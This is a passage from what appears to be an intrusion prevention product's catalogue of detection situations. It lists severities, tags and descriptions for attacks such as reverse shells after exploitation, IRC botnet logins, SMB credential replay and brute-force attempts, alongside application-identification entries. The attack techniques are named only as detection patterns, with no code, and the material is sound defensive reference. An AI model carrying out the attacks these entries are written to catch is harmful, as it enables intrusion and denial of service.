Last changed: sgpkg-ips-593-5211
Description: A denial-of-service vulnerability exists in OpenSSL (CVE-2014-0221). The vulnerability is due to the possibility of unbounded recursion in dtls1_get_message_fragment() during the processing of DTLS handshake messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious DTLS handshake to a target. Successful exploitation could lead to a denial-of-service condition. Source Host: $([[$LN_IP_SOURCE]]/ipv4) Source Port: $([[$LN_PORT_SOURCE]]) Destination Host: $([[$LN_IP_DEST]]/ipv4) Destination Port: $([[$LN_PORT_DEST]])
Back to top

Analyzer_Potential-Attack-IRC-Login-Sequence

About this situation: Potential Attack fingerprint match followed by IRC login
Context: Sequence
Severity: 6
Tags: Potential Compromise, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-141-2032
Last changed: sgpkg-ips-1531-5242
Description: A (potential) attack has occured against the target, after which the target made an IRC login to an IRC server. This could mean that an exploit has been successful and that the target has become a bot for a botnet controlled from an IRC channel. It is also possible that this is a false positive.
Back to top

Analyzer_RealNetworks-RTSP-Helix-Dual-Long-URI

About this situation: An attempt to exploit the RealNetworks Helix RTSP Dual Long URI Buffer Overflow vulnerability detected
Context: Count
Severity: 5
Tags: Compression and Count Events, TCP Client Traffic, Potential Compromise
First detected in: sgpkg-ips-506-5211
Last changed: sgpkg-ips-506-5211
Description: An attempt to exploit a buffer overflow vulnerability (CVE-2002-1643) in RealNetworks Helix RTSP server has been detected. There have been many identical RTSP GET-requests with a suspiciously long arguments. This flaw may be used for remote code execution in RealNetworks Helix Server versions 9.0 and below.
Back to top

Analyzer_RealVNC-Authentication-Bypass

About this situation: Exploit against authentication bypass vulnerability in RealVNC
Context: Sequence
Severity: 8
Tags: Any Operating System, RealVNC Free Edition, RealVNC Personal Edition, RealVNC Enterprise Edition, Any Operating System not specific, Compromise, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-68-1314
Last changed: sgpkg-ips-106-2032
Description: Detects exploit against authentication bypass vulnerability in RealVNC.
Back to top

Analyzer_Reverse-Shell-After-Attack

About this situation: Reverse shell after an attack
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Description: This situation detects a reverse shell after an attack.
Back to top

Analyzer_Reverse-Shell-After-Potential-Compromise

About this situation: Reverse shell after potential compromise
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Description: This situation detects a reverse shell after a potential compromise.
Back to top

Analyzer_Reverse-Shell-After-Suspected-Attack

About this situation: Reverse shell after suspected attack
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Description: This situation detects a reverse shell after an suspected attack.
Back to top

Analyzer_RWP-Multiple-Failed-Login-Attempts-High-Threshhold

About this situation: Multiple failed SSL VPN Web portal login attempts from a single source
Context: Count
Severity: 7
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed SSL VPN Web portal login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_RWP-Multiple-Failed-Login-Attempts-Low-Threshhold

About this situation: Multiple failed SSL VPN Web portal login attempts from a single source
Context: Count
Severity: 5
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed SSL VPN Web portal login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_RWP-Multiple-Failed-Login-Attempts-Medium-Threshhold

About this situation: Multiple failed SSL VPN Web portal login attempts from a single source
Context: Count
Severity: 6
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed SSL VPN Web portal login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_Samba-DNS-Reply-Flag-DoS

About this situation: Analyzer Samba DNS Reply Flag Denial of Service
Context: Count
Severity: 7
Tags: Compression and Count Events, UDP Correlation Dependency Group, Potential Compromise
First detected in: sgpkg-ips-591-5211
Last changed: sgpkg-ips-632-5211
Description: A set of suspicious DNS reply messages have been detected in a limited time. This may indicate a possible Denial of Service attack, such as CVE-2014-0239. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_ScadaBR-Brute-Force-Attack

About this situation: ScadaBR Brute Force attack detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Suspected Compromise
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-627-5211
Description: A brute force attack vulnerability which can lead the the remote attacker gaining credential information for the host system. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Security-Management-Server-Failed-Login

About this situation: A brute-force attack against Security Management Server was detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Suspected Denial of Service
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Description: A brute-force attack against Security Management Server (SMC) has been detected.
Back to top

Analyzer_Shell-After-Attack

About this situation: Shell after attack
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-222-3038
Last changed: sgpkg-ips-222-3038
Description: This situation detects a shell after an attack.
Back to top

Analyzer_Shell-After-Potential-Compromise

About this situation: Shell after potential compromise
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Description: This situation detects a shell after a potential compromise.
Back to top

Analyzer_Shell-After-Suspected-Attack

About this situation: Shell after suspected attack
Context: Sequence
Severity: 8
Tags: Attack Related Anomalies, TCP Client Traffic, TCP Server Traffic
First detected in: sgpkg-ips-324-4219
Last changed: sgpkg-ips-324-4219
Description: This situation detects a shell after an suspected attack.
Back to top

Analyzer_SMB-Bidirectional-Authentication

About this situation: SMB authentication in both directions
Context: Sequence
Severity: 4
Tags: Any Operating System, Any Operating System not specific, TCP Client Traffic, TCP Server Traffic, Potential Compromise
First detected in: sgpkg-ips-184-2032
Last changed: sgpkg-ips-222-3038
Description: An authentication attempt was made in both directions using SMB. This may indicate an attempt to replay authentication credentials.
Back to top

Analyzer_SMB-Brute-Force-Attack

About this situation: Brute Force attack over SMB detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Potential Compromise
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-320-4219
Description: A Brute Force attack to guess username and password pair in order to remotely login to the target server is taking place. Successful attack leads to remote compromise of the target server. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Spotify-Usage

About this situation: Spotify DNS query followed by Spotify network join
Context: Sequence
Severity: 3
Tags: Peer to Peer, TCP Client Traffic
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-219-3038
Vulnerability: Spotify-Usage
Description: This situation detects Spotify network logons.
Back to top

Analyzer_SSH-Password-Login-Brute-Force

About this situation: A password brute-force attack against an SSH server was detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Server Traffic, Potential Compromise
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Description: There have been a large number of short SSH connections in a small period of time. This could be an indicator of a SSH password login brute-force attack. However, the situation could also be triggered in, for example, CI/CD environments where many SSH connections are used between runners, resulting in false positives. Such cases should be manually reviewed so that exceptions could be added accordingly.
Back to top

Analyzer_TCP-SYN-Port-Scan-Or-DoS

About this situation: TCP SYN port scan or denial of service detected
Context: Count
Severity: 7
Tags: Compression and Count Events, TCP Client Traffic, Denial of Service
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-601-5211
Description: Multiple TCP SYN segments without options have been detected. This may be a sign of an ongoing TCP port scan or a denial of service attack. SYN packets without TCP options do not violate the TCP protocol, however there are some DoS tools that generate SYN's without TCP options. Source Host: $([[$LN_SRC]]/ipv4) Source Port: $([[$LN_SPORT]]) Destination Host: $([[$LN_DST]]/ipv4) Destination Port: $([[$LN_DPORT]])
Back to top

Analyzer_Telnet-SMB-Bidirectional-Authentication

About this situation: Telnet and SMB authentication in opposite directions
Context: Sequence
Severity: 4
Tags: Any Operating System, Any Operating System not specific, TCP Client Traffic, TCP Server Traffic, Potential Compromise
First detected in: sgpkg-ips-255-3038
Last changed: sgpkg-ips-416-4219
Vulnerability: Microsoft-Windows-Telnet-Credential-Reflection-Vulnerability
Description: A NTLM authentication attempt was made first over Telnet and then using SMB in the reverse direction. This may indicate an attempt to replay authentication credentials.
Back to top

Analyzer_TOR-Handshake-Traffic

About this situation: Tor Handshake related traffic
Context: Count
Severity: 5
Tags: Compression and Count Events, TCP Client Traffic, Potential Compromise
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-812-5242
Description: Multiple odd TLS SNI's from the same client have been seen. This is usually related to TOR handshake traffic.
Back to top

Analyzer_VPN-Multiple-Failed-Login-Attempts-High-Threshhold

About this situation: Multiple failed VPN login attempts from a single source
Context: Count
Severity: 7
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed VPN login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_VPN-Multiple-Failed-Login-Attempts-Low-Threshhold

About this situation: Multiple failed VPN login attempts from a single source
Context: Count
Severity: 5
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed VPN login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_VPN-Multiple-Failed-Login-Attempts-Medium-Threshhold

About this situation: Multiple failed VPN login attempts from a single source
Context: Count
Severity: 6
Tags: Compression and Count Events, Correlations
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Description: There have been multiple failed VPN login attempts from a single source in a small time window. This situation can be used to trigger blacklisting the source.
Back to top

Analyzer_WebSocket-Connection-Flood

About this situation: Analyzer WebSocket connection flood
Context: Count
Severity: 7
Tags: Suspected Compromise, Compression and Count Events, TCP Client Traffic
First detected in: sgpkg-ips-1824-5242
Last changed: sgpkg-ips-1824-5242
Description: There have been a large number of WebSocket connections in a short period of time. This may indicate a denial-of-service (DoS) attack or an attempt to exploit a race-condition related vulnerability.
Back to top

Analyzer_Windows-DHCP-Server-Denial-of-Service

About this situation: Analyzer Windows DHCP Server Denial-of-Service
Context: Count
Severity: 7
Tags: Suspected Denial of Service, Compression and Count Events
First detected in: sgpkg-ips-1713-5242
Last changed: sgpkg-ips-1713-5242
Description: Windows DHCP server's denial-of-service (DoS) vulnerability.
Back to top

Analyzer_Wormlike-Activity

About this situation: Wormlike activity - exploit fingerprint match and aggressive port scanning started by the victim afterwards
Context: Sequence
Severity: 10
Tags: Any Operating System, Any Operating System not specific, TCP Client Traffic, TCP Server Traffic, Correlations
First detected in: sgpkg-ips-79-1314
Last changed: sgpkg-ips-371-4219
Description: This correlation detects highly suspicious activity where an attack is detected and the victim host starts aggressive port scanning shortly after the exploit. Worms, bots and other automatically spreading malware usually exhibit such behavior.
Back to top

Anaplan

About this situation: Application Anaplan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Planning and performance management solutions across departments, from finance, marketing, supply chain, HR and IT
Back to top

ANCILE-uAlign

About this situation: Application ANCILE-uAlign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ANCILE uAlign is a corporate communications solution in the cloud - accessible via desktop workstation, laptop, smartphone, and tablet. ANCILE uAlign allows you to rapidly communicate key information and confirm receipt and comprehension.With ANCILE uAlign, team members are always informed, always engaged, always productive.
Back to top

Angel

About this situation: Application Angel detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Genesys acquired Angel in March 2013. Genesys is provider of cloud-based Customer Experience Management solutions for Contact Centers.
Back to top

AngelList

About this situation: Application AngelList detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AngelList is a platform for startups.
Back to top

Angie's-List

About this situation: Application Angie's-List detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Angie's List is advertising supported website containing allegedly crowd-sourced reviews of local businesses.
Back to top

Angoss

About this situation: Application Angoss detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Angoss provides predictive analytics software and solutions to facilitate data-driven decision making for businesses.
Back to top

Angry-Birds-Toons

About this situation: Angry Birds Toons usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-640-5211
Last changed: sgpkg-ips-640-5211
Description: Angry Birds Toons is an animated TV show.
Back to top

Animoto

About this situation: Application Animoto detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Animoto is a cloud-based video creation service that produces video from photos, video clips, and music into video slideshows.
Back to top

Anite

About this situation: Application Anite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Anite plc provides mobile device, infrastructure and network testing systems - which incorporate hardware and software - to the international wireless market.
Back to top

Annotary

About this situation: Application Annotary detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Annotary is the social bookmarking and annotation platform that lets you catalog and share everything you read online.
Back to top

AnnualLeave

About this situation: Application AnnualLeave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AnnualLeave.com is an on-line application which enables you to track annual leave and sick leave with the minimum of time and effort.
Back to top

Anonymouse.org

About this situation: Anonymouse.org usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A service that provides anonymizing/proxy services that could allow users to hide or tunnel their online activities; Source Anonymouse
Back to top

Answerbase

About this situation: Application Answerbase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Answerbase - a QandA system for your website in just minutes. Question and answer software for online communities and customer support.
Back to top

AnswerDash

About this situation: Application AnswerDash detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AnswerDash provides your online visitors a customer with website self-service help through contextual answers.
Back to top

Anthem

About this situation: Application Anthem detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Anthem is dedicated to delivering better care to members, providing greater value to customers and helping improve the health of our communities.
Back to top

Anti-Malware_Download-Malware-Signature-Database

About this situation: Dowload new malware signatute database.
Context: Anti-Malware
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-637-5211
Description: New malware signature database was successfully downloaded.
Back to top

Anti-Malware_Download-Malware-Signature-Database-Failure

About this situation: Dowload new malware signatute database failed.
Context: Anti-Malware
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-637-5211
Description: New malware signature database download failed. The reason can be connection problem to update service or dowloaded file is corrupted.
Back to top

Anti-Malware_Malware-Found

About this situation: Malware was found and removed from the stream.
Context: Anti-Malware
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-637-5211
Description: Malware scanning engine found a malware in a message on the stream. The malware was removed.
Back to top

Anti-Malware_Malware-Scan-Failed

About this situation: File scan failed.
Context: Anti-Malware
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-637-5211
Description: Malware scanning engine failed to scan file. The malware was not removed.
Back to top

Anti-Malware_Malware-Scanning-Engine-Deinitialized

About this situation: Malware scanning engine was disconnected from inspection subsystem.
Context: Anti-Malware
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-724-5211
Last changed: sgpkg-ips-724-5211
Description: Malware scanning engine was disconnected from inspection subsystem.
Back to top

Anti-Malware_Malware-Scanning-Engine-Initialization

About this situation: Malware scanning engine was initialized.
Context: Anti-Malware
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-637-5211
Description: Malware scanning engine was successfully initialized. Anti-Malware is ready to scan.
Back to top

Anti-Malware_Malware-Scanning-Engine-Initialization-Failure

About this situation: Malware scanning engine initialization failed.
Context: Anti-Malware
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-637-5211
Description: Malware scanning engine initialization failed. The reason can be corrupted virus definition database file or not enough amount of firewall RAM.
Back to top

Anti-Malware_Malware-Signature-Database-Update

About this situation: Malware signature database update succeed.
Context: Anti-Malware
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-637-5211
Description: Malware signature database update succeed. This situation occurs after successfull incremental update or full manual database upload from SMC.
Back to top

Anti-Malware_Malware-Signature-Database-Update-Check-Failure

About this situation: Check for incremental malware signature database update failed.
Context: Anti-Malware
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-637-5211
Description: Check for incremental malware signature database update failed. The reason can be connection problem to update server.
Back to top

Anti-Malware_Malware-Signature-Database-Update-Failure

About this situation: Malware signature database update failed.
Context: Anti-Malware
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-637-5211
Description: Malware signature database update failed.
Back to top

Anti-Malware_Object-Not-Scanned

About this situation: Object not scanned.
Context: Anti-Malware
Severity: 5
Tags: File Filtering
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-637-5211
Description: Malware scanning of file skipped. Check information message for more details.
Back to top

Anti-Spam_E-Mail-Allowed

About this situation: Email passed inspection without any verdict
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Email has passed inspection without any verdict.
Back to top

Anti-Spam_E-Mail-Blacklisted

About this situation: Email was blacklisted by antispam engine
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Email was blacklisted by antispam engine.
Back to top

Anti-Spam_E-Mail-Discarded

About this situation: Email was discarded by antispam engine
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Email was discarded by antispam engine.
Back to top

Anti-Spam_E-Mail-Dropped

About this situation: Email was dropped by antispam engine
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Email was dropped by antispam engine.
Back to top

Anti-Spam_E-Mail-Graylisted

About this situation: Email was graylisted by antispam engine
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Email was graylisted by antispam engine.
Back to top

Anti-Spam_E-Mail-Rejected

About this situation: Email was rejected by antispam engine
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Email was rejected by antispam engine.
Back to top

Anti-Spam_E-Mail-Tagged

About this situation: Email passed inspection and has been tagged
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Description: Email has passed inspection and has been tagged.
Back to top

Anti-Spam_E-Mail-Whitelisted

About this situation: Email was whitelisted by antispam engine
Context: Firewall Events
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: Email was whitelisted by antispam engine.
Back to top

Anybill

About this situation: Application Anybill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Anybill is a transition automated solution that combines proprietary technology with customer service to deliver a complete Software-as-a-Service solution.
Back to top

AnyDesk

About this situation: AnyDesk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-658-5211
Last changed: sgpkg-ips-1772-5242
Description: AnyDesk is a remote desktop application for Microsoft Windows. The application uses TLS to secure the communication between client and server.
Back to top

Anymeeting

About this situation: AnyMeeting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: AnyMeeting, formerly Freebinar, is a provider of web conferencing and webinar services for small business that enables users to host and attend web based conferences and meetings and share their desktop screen with other remote users via the web. AnyMeeting is a web based software application accessible by users via a web browser. It also offers free and low-cost video conferencing and phone conferencing.Source: Wikipedia
Back to top

Anyperk

About this situation: AnyPerk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: AnyPerk provides employee perks such as discounts and VIP treatment in fitness, telecom, entertainment, travel.
Back to top

Anyplace-Control

About this situation: Application Anyplace-Control detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Anyplace Control - remote support and desktop sharing.
Back to top

AnyPresence

About this situation: Application AnyPresence detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AnyPresence is an Enterprise Backend as a Service (MBaaS) for mobile app development and API augmentation.
Back to top

Aol

About this situation: Application Aol detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Aol is a digital media and technology company that offers video, mobile, and ad solutions to consumers, advertisers and publishers.
Back to top

AOL-Adtech

About this situation: AOL Adtech usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-773-5211
Description: Adtech is a web advertisement and statistics collection service.
Back to top

AOL-Advertising

About this situation: AOL Advertising usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-595-5211
Description: AOL Advertising is an on-line advertising service.
Back to top

AOL-Instant-Messenger

About this situation: AOL Instant Messenger (AIM) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1618-5242
Description: AOL Instant Messenger is an instant messaging and presence software which uses the OSCAR instant messaging protocol and the TOC protocol to allow registered users to communicate in real time.
Back to top

AOL-Mail

About this situation: AOL Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-628-5211
Description: AIM Mail (AOL Mail) is a web-based email service provided by AOL. The service can be accessed at http://mail.aol.com.
Back to top

AOL-Message-Boards

About this situation: AOL message boards usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: AOL-Message-Board is to discuss ideas and issues regarding any ongoing activity in our life.
Back to top

AOL-Oscar

About this situation: AOL OSCAR protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-628-5211
Description: OSCAR protocol is used by the AOL Instant Messenger (AIM).
Back to top

AOL-Oscar-File-Transfer

About this situation: AOL OSCAR OFT2 protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Chat
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-628-5211
Description: In particular, a file transfer using OSCAR was detected. OSCAR protocol is used by the AOL Instant Messenger (AIM).
Back to top

AOL-Proxy

About this situation: AOL Proxy usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Infrastructure Services
First detected in: sgpkg-ips-518-5211
Last changed: sgpkg-ips-759-5211
Description: AOL Proxy is an AOL proxy service/feature which allows users to connect to the Internet with 3rd party applications through the AOL Proxy server.
Back to top

AOL-Radio

About this situation: AOL Radio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: Online free Internet radio from AOL
Back to top

AP-Business-Contacts

About this situation: Application AP-Business-Contacts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AP Business Contacts - contact database of sales leads contains HR managers, HR directors, recruitment managers and training managers
Back to top

Apache-Cassandra

About this situation: Apache Cassandra usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-637-5211
Description: Apache Cassandra is an open source distributed database management system. The database can be access by an RPC interface or a native Cassandra Query Language (CQL) interface.
Back to top

Apartment-Ratings

About this situation: Application Apartment-Ratings detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ApartmentRatings provides transparency into the quality of apartment life, and claims to be an unbiased resource because it does not accept advertising from apartment building managers, owners, or corporations.
Back to top

API2Cart

About this situation: Application API2Cart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: API2Cart is an integration platform, that allows getting connected to shopping carts via just one integration. It allows to connect with stores based on any of the supported platforms and retrieve all the necessary store data for further processing.
Back to top

Apigee

About this situation: Application Apigee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Apigee is an API management and predictive analytics platform that helps enterprises create and operate APIs and apps.
Back to top

Aplicor

About this situation: Application Aplicor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aplicor Cloud Suite 7 is a web-based CRM application that enables Sales Force Automation, Marketing Automation, Project Office and Customer Support in a single solution. Aplicor Cloud Suite 7 is a true cloud business solution that eliminates manual workarounds so your workflows run more smoothly.
Back to top

Aplos-Donor-Management

About this situation: Application Aplos-Donor-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aplos Donor Management is an online donor management software for nonprofits to track donations and communicate with supporters.
Back to top

Apoio

About this situation: Apoio usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Apoio focuses on delivering professional cleaning, check-in and checkout services.
Back to top

App-Annie

About this situation: App Annie usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: App Annie provide app ranking data and high quality mobile analytics - app store download, app store sales and other insightful app store data for iOS and Android.
Back to top

App.net

About this situation: Application App.net detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: App.net is a mobile app distribution and monetization platform for iOS and Android.
Back to top

Appcelerator-Network

About this situation: Application Appcelerator-Network detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Appcelerator helps companies solve for this new mobile reality: delivering native cross-platform apps at the speed of web, mobilizing any data source, and driving success with real-time analytics - all from an open, cloud based platform.
Back to top

AppDynamics

About this situation: Application AppDynamics detected
Context: Application Context
Severity: 1
